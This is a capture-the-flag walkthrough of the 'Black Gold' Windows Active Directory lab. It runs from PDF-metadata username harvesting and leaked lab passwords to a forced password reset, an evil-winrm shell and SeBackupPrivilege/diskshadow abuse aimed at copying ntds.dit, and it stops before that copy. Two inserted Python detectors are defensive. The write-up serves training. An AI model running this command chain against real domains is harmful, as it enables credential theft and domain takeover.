TheHackersLabs-Black Gold-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.56.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100 08:00:27:3c:5c:5a PCS Systemtechnik GmbH
192.168.56.118 0a:00:27:00:00:0e (Unknown: locally administered)

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.125 seconds (120.47 hosts/sec). 2 responded
export ip=192.168.56.118
❯ nmap -sS -sV -p- -A $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 16:11 CST
Nmap scan report for 192.168.56.10
Host is up (0.00050s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Neptune
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-14 08:13:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
55182/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55183/tcp open msrpc Microsoft Windows RPC
55193/tcp open msrpc Microsoft Windows RPC
55202/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:6A:38:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6a:38:cb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-14T08:14:24
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.56.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.49 seconds

Windows targets generally expose a large number of ports.

The LDAP service reveals the domain name neptune.thl.

Add it to /etc/hosts:

echo "$ip neptune.thl"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.56.10 neptune.thl

Enumerate the directories on port 80:

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 25680]
/images (Status: 301) [Size: 151] [--> http://192.168.56.10/images/]
/contact.html (Status: 200) [Size: 9313]
/about.html (Status: 200) [Size: 8948]
/docs (Status: 301) [Size: 149] [--> http://192.168.56.10/docs/]
/Images (Status: 301) [Size: 151] [--> http://192.168.56.10/Images/]
/service.html (Status: 200) [Size: 12848]
/css (Status: 301) [Size: 148] [--> http://192.168.56.10/css/]
/Contact.html (Status: 200) [Size: 9313]
/About.html (Status: 200) [Size: 8948]
/Index.html (Status: 200) [Size: 25680]
/js (Status: 301) [Size: 147] [--> http://192.168.56.10/js/]
Progress: 7772 / 1102800 (0.70%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 8243 / 1102800 (0.75%)
===============================================================
Finished
===============================================================

Use kerbrute to try enumerating domain usernames.

Nothing comes out:

❯ kerbrute_linux_amd64 userenum -d neptune.thl --dc 192.168.56.10 /usr/share/seclists/Usernames/Names/names.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/14/25 - Ronnie Flathers @ropnop

2025/03/14 16:50:30 > Using KDC(s):
2025/03/14 16:50:30 > 192.168.56.10:88

2025/03/14 16:50:33 > Done! Tested 10177 usernames (0 valid) in 3.498 seconds

PDF File Enumeration

On the home page we can find the company's reports, which link into the /docs directory. The naming is fairly regular: 2024-02-15.pdf is named by year-month-day.

So we can try enumerating PDFs for other dates.

Write a script that downloads every PDF from 2023 up to today:

❯ curr_date="2023-01-01"; end_date="2025-03-14"; while [[ "$curr_date" != "$end_date" ]]; do echo "${curr_date}.pdf"; wget "$ip/docs/${curr_date}.pdf"; curr_date=$(date -d "$curr_date +1 day" "+%Y-%m-%d"); done
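The same date walk is visible from the server side. The following is an added example, not code from the original walkthrough: it parses IIS W3C log lines (the sample log is constructed for this example, not taken from the target, and the column layout is read from the #Fields directive so a different field selection still works) and flags a client that requests many /docs/YYYY-MM-DD.pdf paths for consecutive days with mostly 404 responses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C sample (not a log from the original page): one client walking
# date-named reports in /docs day by day, plus an ordinary visitor.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2025-03-14 09:00:01 192.168.56.10 GET /index.html - 80 - 192.168.56.50 Mozilla/5.0 200 0 0 15
2025-03-14 09:00:02 192.168.56.10 GET /docs/2024-02-15.pdf - 80 - 192.168.56.50 Mozilla/5.0 200 0 0 31
2025-03-14 09:05:00 192.168.56.10 GET /docs/2023-01-01.pdf - 80 - 192.168.56.100 Wget/1.21 404 0 2 3
2025-03-14 09:05:00 192.168.56.10 GET /docs/2023-01-02.pdf - 80 - 192.168.56.100 Wget/1.21 404 0 2 2
2025-03-14 09:05:01 192.168.56.10 GET /docs/2023-01-03.pdf - 80 - 192.168.56.100 Wget/1.21 404 0 2 2
2025-03-14 09:05:01 192.168.56.10 GET /docs/2023-01-04.pdf - 80 - 192.168.56.100 Wget/1.21 404 0 2 2
2025-03-14 09:05:01 192.168.56.10 GET /docs/2023-01-05.pdf - 80 - 192.168.56.100 Wget/1.21 200 0 0 40
2025-03-14 09:05:02 192.168.56.10 GET /docs/2023-01-06.pdf - 80 - 192.168.56.100 Wget/1.21 404 0 2 2
"""

DATE_PDF = re.compile(r"^/docs/(\d{4}-\d{2}-\d{2})\.pdf$", re.IGNORECASE)


def parse_iis_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # no header yet or a malformed line: skip rather than guess columns
        yield dict(zip(fields, parts))


def longest_consecutive_run(days):
    """Length of the longest run of calendar-consecutive dates in a set of date objects."""
    best = 0
    for d in days:
        if d - timedelta(days=1) in days:
            continue  # not the start of a run
        length = 1
        while d + timedelta(days=length) in days:
            length += 1
        best = max(best, length)
    return best


def detect_date_enumeration(text, min_requests=5, min_run=3, min_miss_ratio=0.5):
    """Return {client_ip: stats} for clients whose /docs traffic looks like a date walk."""
    per_client = defaultdict(lambda: {"days": set(), "misses": 0, "total": 0})
    for rec in parse_iis_w3c(text):
        m = DATE_PDF.match(rec["cs-uri-stem"])
        if not m:
            continue
        stats = per_client[rec["c-ip"]]
        stats["total"] += 1
        if rec["sc-status"] == "404":
            stats["misses"] += 1
        try:
            stats["days"].add(datetime.strptime(m.group(1), "%Y-%m-%d").date())
        except ValueError:
            pass  # e.g. 2023-02-30: still counted as a probe, but not a real calendar day
    alerts = {}
    for ip, s in per_client.items():
        run = longest_consecutive_run(s["days"])
        miss_ratio = s["misses"] / s["total"]
        if s["total"] >= min_requests and run >= min_run and miss_ratio >= min_miss_ratio:
            alerts[ip] = {"requests": s["total"], "not_found": s["misses"], "consecutive_days": run}
    return alerts


if __name__ == "__main__":
    for ip, stats in detect_date_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {stats}")
```

The consecutive-day run is the discriminating signal: a legitimate reader opens a handful of reports in no particular order, while a scripted walk touches every calendar day and collects a 404 for each date that has no report.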

Use exiftool to inspect each PDF's Creator field.

Each PDF has a different creator:

❯ exiftool 2024-01-01.pdf
ExifTool Version Number : 13.10
File Name : 2024-01-01.pdf
Directory : .
File Size : 50 kB
File Modification Date/Time : 2025:02:27 23:10:38+08:00
File Access Date/Time : 2025:03:14 16:58:36+08:00
File Inode Change Date/Time : 2025:03:14 16:58:36+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
Author : Neptune Oil & Gas
Create Date : 2025:02:27 12:10:36-03:00
Creator : Mary.Johnson
Modify Date : 2025:02:27 12:10:36-03:00
Producer : ReportLab PDF Library - www.reportlab.com
Subject : Informe sobre sostenibilidad y reducción de emisiones de CO2
Title : Reporte 2024-01-01
Trapped : False
Page Mode : UseNone
Page Count : 20

Read the creator usernames in bulk:

❯ exiftool -Creator *.pdf|grep -v "===="|awk '{print $3}'|sort|uniq>user.txt
Warning: Invalid xref table - 2024-05-01.pdf
head user.txt
Elizabeth.Davis
Elizabeth.Garcia
Elizabeth.Johnson
Elizabeth.Jones
Elizabeth.Miller
Elizabeth.Smith
Elizabeth.Wilson
files
James.Brown
James.Davis
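The Creator leak can be caught on the publishing side before a report reaches the web root. The following is an added example, not code from the original walkthrough: a small reader for the PDF Info dictionary (no external libraries) that pulls the Creator and Author strings, handles both literal and hex string encodings, and flags values shaped like an account name (First.Last). The PDFs it runs on are constructed inside the script; the file names and creator values are assumptions for illustration.

```python
import re

USERNAME_SHAPE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")  # First.Last, the account-name shape seen in the Creator field
# /Key followed by a literal string "( ... )" (with \-escapes) or a hex string "< ... >"
INFO_STRING = re.compile(rb"/(Creator|Author|Producer|Title)\s*(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)")


def decode_pdf_string(raw: bytes) -> str:
    """Decode a PDF literal or hex string object into text (PDFDocEncoding treated as Latin-1)."""
    if raw.startswith(b"<"):
        hexdigits = re.sub(rb"\s", b"", raw[1:-1])
        return bytes.fromhex(hexdigits.decode("ascii")).decode("latin-1")
    body = raw[1:-1]
    body = re.sub(rb"\\([()\\])", rb"\1", body)  # unescape \( \) and \\
    return body.decode("latin-1")


def pdf_info_fields(data: bytes) -> dict:
    """Return the first Creator/Author/Producer/Title strings found in the file."""
    fields = {}
    for key, raw in INFO_STRING.findall(data):
        fields.setdefault(key.decode("ascii"), decode_pdf_string(raw))
    return fields


def audit_pdfs(docs: dict) -> dict:
    """docs maps filename -> bytes. Returns {filename: {field: value}} for fields that look like account names."""
    findings = {}
    for name, data in docs.items():
        info = pdf_info_fields(data)
        leaks = {k: v for k, v in info.items() if k in ("Creator", "Author") and USERNAME_SHAPE.match(v)}
        if leaks:
            findings[name] = leaks
    return findings


def build_sample_pdf(creator: str, hex_creator: bool = False) -> bytes:
    """Constructed minimal PDF (not a file from the original page): just enough to carry an Info dictionary."""
    creator_obj = (b"<" + creator.encode("latin-1").hex().encode("ascii") + b">"
                   if hex_creator else b"(" + creator.encode("latin-1") + b")")
    return (b"%PDF-1.3\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /Author (Neptune Oil & Gas) /Creator " + creator_obj +
            b" /Producer (ReportLab PDF Library - www.reportlab.com) >> endobj\n"
            b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n")


# Constructed corpus standing in for the /docs directory (assumed names and creators).
SAMPLE_DOCS = {
    "2024-01-01.pdf": build_sample_pdf("Mary.Johnson"),
    "2024-01-02.pdf": build_sample_pdf("Reporting Team"),
    "2024-01-03.pdf": build_sample_pdf("James.Brown", hex_creator=True),
}

if __name__ == "__main__":
    for name, leaks in audit_pdfs(SAMPLE_DOCS).items():
        print(f"{name}: {leaks}")
```

A generator such as ReportLab writes whatever the caller passes as the creator, so the fix belongs in the report pipeline (set a department name, not the operator's login); this check is the gate that proves the fix stuck.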

Enumerate usernames again with this list.

This yields the user Lucas.Miller:

❯ kerbrute_linux_amd64 userenum -d neptune.thl --dc 192.168.56.10 user.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/14/25 - Ronnie Flathers @ropnop

2025/03/14 17:13:50 > Using KDC(s):
2025/03/14 17:13:50 > 192.168.56.10:88

2025/03/14 17:13:50 > [+] VALID USERNAME: [email protected]
2025/03/14 17:13:50 > Done! Tested 62 usernames (1 valid) in 0.047 seconds

Search the PDFs for content mentioning Lucas.Miller.

2023-01-12.pdf contains Lucas.Miller's password E@6q%TnR7UEQSXywr8^@:

❯ pdfgrep  -i 'Lucas.Miller' *.pdf
2023-01-12.pdf:Estimado Lucas Miller,
2023-01-12.pdf: ●​ Nombre de usuario (Usuario AD): [email protected]


AD Domain Information Gathering

With a user credential in hand, use netexec to collect the data BloodHound needs.

Bloodhound Ingestor | NetExec

❯ netexec ldap $ip -u Lucas.Miller -p  E@6q%TnR7UEQSXywr8^@ --bloodhound -c All -d neptune.thl --dns-server $ip
SMB 192.168.56.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 DC01 [+] neptune.thl\Lucas.Miller:E@6q%TnR7UEQSXywr8^@
LDAP 192.168.56.10 389 DC01 Resolved collection methods: container, rdp, acl, psremote, session, objectprops, dcom, group, trusts, localadmin
LDAP 192.168.56.10 389 DC01 Done in 00M 00S
LDAP 192.168.56.10 389 DC01 Compressing output into /home/Pepster/.nxc/logs/DC01_192.168.56.10_2025-03-14_194910_bloodhound.zip

Import the collected Active Directory data into the BloodHound GUI.

Use rpcclient to enumerate the other domain users: the description field of victor.rodriguez contains the password H5gVCzzZkzJ#wGsT8u1$.

❯ rpcclient -U "Lucas.Miller%E@6q%TnR7UEQSXywr8^@" $ip
rpcclient $> querydispinfo
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfb5 RID: 0x453 acb: 0x00000210 Account: emma.johnson Name: Emma Johnson Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf11 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: lucas.miller Name: Lucas Miller Desc: (null)
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: thomas.brown Name: Thomas Brown Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: victor.rodriguez Name: Victor Rodriguez Desc: My Password is H5gVCzzZkzJ#wGsT8u1$

victor.rodriguez is also a member of the IT group.

Credential Leak

Try connecting with smbclient and download the script from the Scripts folder.

backup.ps1 contains the credential emma.johnson:sb9TVndq8N@tUVMmP2@#:

❯ smbclient -U 'neptune.thl/victor.rodriguez%H5gVCzzZkzJ#wGsT8u1$' //192.168.56.10/IT
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Feb 27 08:14:40 2025
.. DHS 0 Fri Feb 28 03:52:00 2025
Scripts D 0 Thu Feb 27 08:16:55 2025

10540543 blocks of size 4096. 7042590 blocks available
smb: \> cd Scripts\
smb: \Scripts\> ls
. D 0 Thu Feb 27 08:16:55 2025
.. D 0 Thu Feb 27 08:14:40 2025
backup.ps1 A 1957 Thu Feb 27 08:20:11 2025

10540543 blocks of size 4096. 7042590 blocks available
smb: \Scripts\> get backup.ps1
getting file \Scripts\backup.ps1 of size 1957 as backup.ps1 (273.0 KiloBytes/sec) (average 273.0 KiloBytes/sec)
smb: \Scripts\> exit
cat backup.ps1
$sourceDirectory = "C:\Confidenciales"
$destinationDirectory = "E:\Backups\Confidenciales"

$username = "emma.johnson"
$password = ConvertTo-SecureString "sb9TVndq8N@tUVMmP2@#" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

$emailFrom = "[email protected]"
$emailTo = "[email protected]"
$smtpServer = "smtp.neptune.thl"
$smtpPort = 587
$emailSubject = "Notificación de Backup Completo"

$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "report_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName

function Send-EmailNotification {
param (
[string]$subject,
[string]$body
)
try {
$smtpClient = New-Object System.Net.Mail.SmtpClient($smtpServer, $smtpPort)
$smtpClient.EnableSsl = $true
$smtpClient.Credentials = New-Object System.Net.NetworkCredential("smtp_user", "smtp_password")

$mailMessage = New-Object System.Net.Mail.MailMessage($emailFrom, $emailTo, $subject, $body)
$smtpClient.Send($mailMessage)
Write-Host "Correo enviado a $emailTo"
}
catch {
Write-Host "Error al enviar el correo: $_"
}
}

try {
Write-Host "Iniciando el backup..."
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completado exitosamente. Archivo guardado en: $backupFilePath"

$emailBody = "El proceso de backup se ha completado correctamente." + "`n" + "Archivo de backup: $backupFilePath"

Send-EmailNotification -subject $emailSubject -body $emailBody
}
catch {
Write-Host "Error al realizar el backup: $_"

$errorSubject = "Error en el proceso de Backup"
$errorBody = "Hubo un problema al realizar el backup." + "`n" + "Error: $_"
Send-EmailNotification -subject $errorSubject -body $errorBody
}

Use this credential to gather information again, checking each available service in turn.

WinRM allows remote command execution with it:

❯ netexec smb $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
SMB 192.168.56.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 DC01 [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@#
❯ netexec winrm $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
WINRM 192.168.56.10 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:neptune.thl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.10 5985 DC01 [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@# (Pwn3d!)
❯ netexec ldap $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
SMB 192.168.56.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 DC01 [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@#

Change Password Rights

The box needs to be reinstalled at this point, otherwise the ForceChangePassword right does not show up.

Looking at BloodHound again, emma.johnson has the right to force a password change on THOMAS.BROWN.

Try changing THOMAS.BROWN's password to P@ssw0rd.

This account can also run commands over WinRM:

❯ net rpc password "thomas.brown" "P@ssw0rd" -U neptune.thl/emma.johnson%'sb9TVndq8N@tUVMmP2@#' -S dc01.neptune.thl
❯ netexec ldap $ip -u THOMAS.BROWN -p P@ssw0rd
SMB 192.168.56.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 DC01 [+] neptune.thl\THOMAS.BROWN:P@ssw0rd (Pwn3d!)
❯ netexec smb $ip -u THOMAS.BROWN -p P@ssw0rd
SMB 192.168.56.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 DC01 [+] neptune.thl\THOMAS.BROWN:P@ssw0rd
❯ netexec winrm $ip -u THOMAS.BROWN -p P@ssw0rd
WINRM 192.168.56.10 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:neptune.thl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.10 5985 DC01 [+] neptune.thl\THOMAS.BROWN:P@ssw0rd (Pwn3d!)

User Privilege Escalation

Get a shell with evil-winrm and run commands:

❯ evil-winrm -i $ip -u thomas.brown -p P@ssw0rd

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\thomas.brown\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\thomas.brown\Documents>
  • SeMachineAccountPrivilege: allows the user to add workstations to the domain. (Enabled)
  • SeBackupPrivilege: allows the user to back up files and directories, overriding file and directory permissions. (Enabled)
  • SeRestorePrivilege: allows the user to restore files and directories, overriding file and directory permissions. (Enabled)
  • SeShutdownPrivilege: allows the user to shut down the system. (Enabled)
  • SeChangeNotifyPrivilege: allows the user to bypass traverse checking. (Enabled)
  • SeIncreaseWorkingSetPrivilege: allows the user to increase a process's working set. (Enabled)

Diskshadow Volume Shadow Copy

Privileges can be understood as a finer-grained version of Linux sudo rights.

SeBackupPrivilege, for instance, is comparable to sudo cat /etc/shadow (bypassing permissions to read sensitive files).

Abusing Tokens - HackTricks

gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.

Abusing it lets us read the administrator's password hash.

First find a writable directory and write a diskshadow command file, one command at a time:

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "set context persistent nowriters" | out-file ./tmp.txt -encoding ascii
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "set metadata C:\\Windows\\Temp\\meta.cab" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "add volume c: alias temp" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "create" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "expose %temp% H:" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> type tmp.txt
set context persistent nowriters
set metadata C:\\Windows\\Temp\\meta.cab
add volume c: alias temp
create
expose %temp% H:
  • set context persistent nowriters: sets the context for a persistent shadow copy and specifies that no writers (components that could change the volume) are involved.
  • set metadata C:\Windows\Temp\meta.cab: sets the metadata storage location to the given file path.
  • add volume c: alias temp: adds volume C: and gives it the alias temp.
  • create: creates a new shadow copy with the specified context and metadata settings.
  • expose %temp% H:: exposes the shadow copy aliased temp as a new drive H:.

Run it.

This creates a shadow copy of C: exposed as drive H:.

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> diskshadow /s tmp.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 3/14/2025 11:17:00 AM

-> set context persistent nowriters
-> set metadata C:\\Windows\\Temp\\meta.cab
-> add volume c: alias temp
-> create
Alias temp for shadow ID {c2c62242-80f6-43ff-92d8-6979df11e1c2} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {0da2ca2d-ba81-4bd9-946e-c6681f8411a2} set as environment variable.

Querying all shadow copies with the shadow copy set ID {0da2ca2d-ba81-4bd9-946e-c6681f8411a2}

* Shadow copy ID = {c2c62242-80f6-43ff-92d8-6979df11e1c2} %temp%
- Shadow copy set: {0da2ca2d-ba81-4bd9-946e-c6681f8411a2} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{c2f9909f-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 3/14/2025 11:17:00 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.neptune.thl
- Service machine: DC01.neptune.thl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% H:
-> %temp% = {c2c62242-80f6-43ff-92d8-6979df11e1c2}
The shadow copy was successfully exposed as H:\.
->

diskshadow is a command-line tool built into Windows for managing the Volume Shadow Copy Service (VSS). It creates, deletes and restores shadow copies, and is commonly used for backup, forensic analysis, privilege escalation and data recovery.

Upload the DLLs.

giuliano108/SeBackupPrivilege: use SE_BACKUP_NAME/SeBackupPrivilege to access objects you are not supposed to access.

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> upload /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

Info: Uploading /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\Users\thomas.brown\Desktop\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> upload /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll

Info: Uploading /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\Users\thomas.brown\Desktop\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> ls


Directory: C:\Users\thomas.brown\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/14/2025 11:20 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 3/14/2025 11:20 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 3/14/2025 11:14 AM 128 tmp.txt

Without this DLL tool, a direct copy fails, because ntds.dit is a locked database file: the lsass.exe process keeps it locked to ensure data integrity.

Even from the VSS shadow copy the copy still fails:

  • the process lock leaves the file in use
  • NTFS ACLs restrict access
  • the shadow copy inherits the NTFS ACLs of the original C: drive
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> copy H:\Windows\NTDS\ntds.dit C:\Temp\
Access to the path 'H:\Windows\NTDS\ntds.dit' is denied.
At line:1 char:1
+ copy H:\Windows\NTDS\ntds.dit C:\Temp\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (H:\Windows\NTDS\ntds.dit:FileInfo) [Copy-Item], UnauthorizedAccessException
+ FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

So we upload the DLLs and import them:

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> import-module .\SeBackupPrivilegeUtils.dll
  • SeBackupPrivilegeUtils.dll: enables SeBackupPrivilege and SeRestorePrivilege.
  • SeBackupPrivilegeCmdLets.dll: provides cmdlets such as Copy-FileSeBackupPrivilege that bypass NTFS ACL restrictions to copy protected files (such as ntds.dit).

Copy the Active Directory database and the SYSTEM hive to the current directory:

